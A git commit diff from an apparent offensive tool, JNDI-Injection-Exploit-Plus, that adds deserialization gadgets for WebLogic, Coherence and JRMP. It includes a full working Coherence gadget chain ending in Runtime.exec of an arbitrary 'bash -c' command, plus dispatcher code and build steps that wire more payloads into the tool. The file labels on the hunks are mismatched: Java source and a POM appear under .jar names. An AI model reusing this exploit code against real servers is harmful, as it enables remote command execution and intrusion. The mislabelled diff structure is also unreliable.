add more gadgets

Author: cckuailong

README.md

@@ -33,7 +33,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 37)
+#### 3. Deserailization Gadget (total: 51)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -44,6 +44,7 @@ BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
 C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
 Click1              |@artsploit                  |click-nodeps:2.3.0, javax.servlet-api:3.1.0
 Clojure             |@JackOfMostTrades           |clojure:1.8.0
+Coherence :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
 CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
 CommonsBeanutils2 :arrow_up:   |@cckuailong                 |commons-beanutils:1.9.2
 CommonsCollections1 |@frohoff                    |commons-collections:3.1
@@ -62,7 +63,13 @@ Hibernate1          |@mbechler|
 Hibernate2          |@mbechler|
 JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
 Jdk7u21             |@frohoff|
-JRMPClient          |@mbechler|
+JRMPClient1         |@mbechler|
+JRMPClient2 :arrow_up:         |@cckuailong|
+JRMPClient3 :arrow_up:         |@cckuailong|
+JRMPClient4 :arrow_up:         |@cckuailong|
+JRMPClient5 :arrow_up:         |@cckuailong|
+JRMPClient6 :arrow_up:         |@cckuailong|
+JRMPListener1       |@cckuailong|
 JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
 JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
 Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
@@ -79,6 +86,8 @@ URLDNS              |@gebl						 |jre only vuln detect
 Vaadin1             |@kai_ullrich                |vaadin-server:7.7.14, vaadin-shared:7.7.14
 Weblogic1 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
 Weblogic2 :arrow_up:           |@cckuailong                 |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
+Weblogic3 :arrow_up:           |@cckuailong                 |com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
+Weblogic4 :arrow_up:           |@cckuailong                 |weblogic.common.internal.WLObjectOutputStream
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1 :arrow_up:            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
@@ -219,6 +228,8 @@ We can select one of the two methods to get the jar.
    $ mvn clean package -DskipTests
    ```
 
+**P.S**. :bangbang: If you get the error like "java.rmi.xxx does not exists", you should set the JAVA_HOME env.
+
 ## Disclaimer
 
 All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

libs/coherence.jar

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.4-SNAPSHOT</version>
+    <version>1.5-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -240,6 +240,21 @@
             <artifactId>wlfullclient</artifactId>
             <version>1.0-SNAPSHOT</version>
         </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>spring</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>logging</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>coherence</artifactId>
+            <version>12.2.1</version>
+        </dependency>
 
         <!-- test -->
         <dependency>
@@ -314,19 +329,56 @@
                             <goal>install-file</goal>
                         </goals>
                     </execution>
+                    <execution>
+                        <id>install-weblogic3</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/com.bea.core.repackaged.springframework.spring_1.5.0.0_2-5-3.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>spring</artifactId>
+                            <version>1.0-SNAPSHOT</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>install-weblogic3-2</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/com.bea.core.repackaged.apache.commons.logging_1.2.4.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>logging</artifactId>
+                            <version>1.0-SNAPSHOT</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>install-coherence</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/coherence.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>coherence</artifactId>
+                            <version>12.2.1</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
                 </executions>
             </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-surefire-plugin</artifactId>
-                <version>3.0.0-M1</version>
-                <configuration>
-                    <trimStackTrace>false</trimStackTrace>
-                    <systemPropertyVariables>
-                        <java.rmi.server.useCodebaseOnly>false</java.rmi.server.useCodebaseOnly>
-                    </systemPropertyVariables>
-                </configuration>
-            </plugin>
         </plugins>
     </build>
 

libs/com.bea.core.repackaged.apache.commons.logging_1.2.4.jar

@@ -3,14 +3,11 @@
 import payloads.*;
 
 import java.net.URL;
-import java.util.Base64;
 
 public class CommonDeserial {
-    private URL codebase;
     private String command;
 
-    public CommonDeserial(URL codebase, String command){
-        this.codebase = codebase;
+    public CommonDeserial(String command){
         this.command = command;
     }
 
@@ -61,18 +58,17 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = BeanShell1.getBytes(command);
                 break;
             case "C3P0":
-                if (codebase != null){
-                    bytes = C3P0.getBytes(codebase);
-                }else{
-                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
-                }
+                bytes = C3P0.getBytes(command);
                 break;
             case "Click1":
                 bytes = Click1.getBytes(command);
                 break;
             case "Clojure":
                 bytes = Clojure.getBytes(command);
                 break;
+            case "Coherence":
+                bytes = Coherence.getBytes(command);
+                break;
             case "FileUpload1":
                 bytes = FileUpload1.getBytes(command);
                 break;
@@ -83,11 +79,7 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Hibernate1.getBytes(command);
                 break;
             case "Hibernate2":
-                if (codebase != null){
-                    bytes = Hibernate2.getBytes(codebase);
-                }else{
-                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
-                }
+                bytes = Hibernate2.getBytes(command);
                 break;
             case "JavassistWeld1":
                 bytes = JavassistWeld1.getBytes(command);
@@ -111,11 +103,7 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Myfaces1.getBytes(command);
                 break;
             case "Myfaces2":
-                if (codebase != null){
-                    bytes = Myfaces2.getBytes(codebase);
-                }else{
-                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
-                }
+                bytes = Myfaces2.getBytes(command);
                 break;
             case "ROME1":
                 bytes = ROME1.getBytes(command);
@@ -130,11 +118,7 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Spring2.getBytes(command);
                 break;
             case "Spring3":
-                if (codebase != null){
-                    bytes = Spring3.getBytes(codebase);
-                }else{
-                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
-                }
+                bytes = Spring3.getBytes(command);
                 break;
             case "URLDNS":
                 bytes = URLDNS.getBytes(command);
@@ -146,23 +130,43 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Wicket1.getBytes(command);
                 break;
             case "WildFly1":
-                if (codebase != null){
-                    bytes = WildFly1.getBytes(codebase);
-                }else{
-                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
-                }
+                bytes = WildFly1.getBytes(command);
                 break;
             case "Weblogic1":
                 bytes = Weblogic1.getBytes(command);
                 break;
             case "Weblogic2":
                 bytes = Weblogic2.getBytes(command);
                 break;
+            case "Weblogic3":
+                bytes = Weblogic3.getBytes(command);
+                break;
+            case "Weblogic4":
+                bytes = Weblogic4.getBytes(command);
+                break;
             case "Jdk7u21":
                 bytes = Jdk7u21.getBytes(command);
                 break;
-            case "JRMPClient":
-                bytes = JRMPClient.getBytes(command);
+            case "JRMPClient1":
+                bytes = JRMPClient1.getBytes(command);
+                break;
+            case "JRMPClient2":
+                bytes = JRMPClient2.getBytes(command);
+                break;
+            case "JRMPClient3":
+                bytes = JRMPClient3.getBytes(command);
+                break;
+            case "JRMPClient4":
+                bytes = JRMPClient4.getBytes(command);
+                break;
+            case "JRMPClient5":
+                bytes = JRMPClient5.getBytes(command);
+                break;
+            case "JRMPClient6":
+                bytes = JRMPClient6.getBytes(command);
+                break;
+            case "JRMPListener1":
+                bytes = JRMPListener1.getBytes(command);
                 break;
 
             default:

libs/com.bea.core.repackaged.springframework.spring_1.5.0.0_2-5-3.jar

@@ -142,8 +142,8 @@ public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
 
 
         protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
-            CommonRef commonRef = new CommonRef(this.codebase, this.command);
-            CommonDeserial commonDeserial = new CommonDeserial(this.codebase, this.command);
+            CommonRef commonRef = new CommonRef(this.command);
+            CommonDeserial commonDeserial = new CommonDeserial(this.command);
             String cbstring = this.codebase.toString();
 
             if (base.startsWith("remote")) {

pom.xml

@@ -345,7 +345,7 @@ private boolean handleRMI ( ObjectInputStream ois, DataOutputStream out ) throws
             new UID().write(oos);
 
             ReferenceWrapper rw = Reflections.createWithoutConstructor(ReferenceWrapper.class);
-            CommonRef commonRef = new CommonRef(this.classpathUrl, this.command);
+            CommonRef commonRef = new CommonRef(this.command);
 
             if (reference.equals("BypassByEL")){
                 System.out.printf("%s [RMISERVER] [%s]  >> Sending local classloading reference.\n", getLocalTime(), reference);

src/main/java/jndi/CommonDeserial.java

@@ -33,6 +33,8 @@
  * Yields:
  * - Instantiation of remotely loaded class
  *
+ * Command: http://x.x.x.x:xx:exploit
+ *
  * @author mbechler
  *
  */
@@ -80,8 +82,8 @@ public void setLoginTimeout ( int seconds ) throws SQLException {}
 
     }
 
-    public static byte[] getBytes ( URL codebase ) throws Exception {
-        return PayloadRunner.run(C3P0.class, String.format("%s:ExecTemplateJDK8", codebase));
+    public static byte[] getBytes ( final String command ) throws Exception {
+        return PayloadRunner.run(C3P0.class, command);
     }
 
     public static void main ( final String command ) throws Exception {

src/main/java/jndi/LDAPRefServer.java

@@ -0,0 +1,63 @@
+package payloads;
+
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+import com.tangosol.util.filter.LimitFilter;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import javax.management.BadAttributeValueExpException;
+import java.lang.reflect.Field;
+
+/*
+ * gadget:
+ *      BadAttributeValueExpException.readObject()
+ *          com.tangosol.util.filter.LimitFilter.toString()
+ *              com.tangosol.util.extractor.ChainedExtractor.extract()
+ *                  com.tangosol.util.extractor.ReflectionExtractor.extract()
+ *                      Method.invoke()
+ *                      ...
+ *                      Runtime.getRuntime.exec()
+ */
+
+@Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"})
+@Authors({ Authors.CCKUAILONG })
+public class Coherence extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+
+	public BadAttributeValueExpException getObject(final String command) throws Exception {
+		ValueExtractor[] valueExtractors = new ValueExtractor[]{
+				new ReflectionExtractor("getMethod", new Object[]{
+						"getRuntime", new Class[0]
+				}),
+				new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
+				new ReflectionExtractor("exec", new Object[]{new String[]{"bash", "-c", command}})
+		};
+		//初始化LimitFiler类实例
+		LimitFilter limitFilter = new LimitFilter();
+		limitFilter.setTopAnchor(Runtime.class);
+		BadAttributeValueExpException expException = new BadAttributeValueExpException(null);
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors));
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+		//将limitFilter放入BadAttributeValueExpException的val属性中
+		Field val = expException.getClass().getDeclaredField("val");
+		val.setAccessible(true);
+		val.set(expException, limitFilter);
+
+		return expException;
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return PayloadRunner.run(Coherence.class, command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Coherence.class, command);
+	}
+
+}